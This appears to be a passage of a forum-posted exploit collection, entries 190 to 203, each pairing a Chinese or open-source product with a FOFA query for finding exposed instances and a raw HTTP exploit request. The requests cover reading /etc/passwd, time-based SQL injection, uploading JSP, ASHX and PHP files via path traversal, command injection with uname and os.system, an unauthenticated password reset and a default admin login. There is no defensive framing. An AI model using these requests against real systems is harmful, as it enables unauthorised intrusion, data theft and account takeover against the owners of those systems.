190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd


191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=


192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}


193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0


194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--


195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}


196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}


197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close


198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close


199. cockpit assetsmanager_upload endpoint file upload

1. Run the POC to obtain the csrf value and then the session cookie, then upload and access the uploaded file:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1


202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values with those obtained above:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2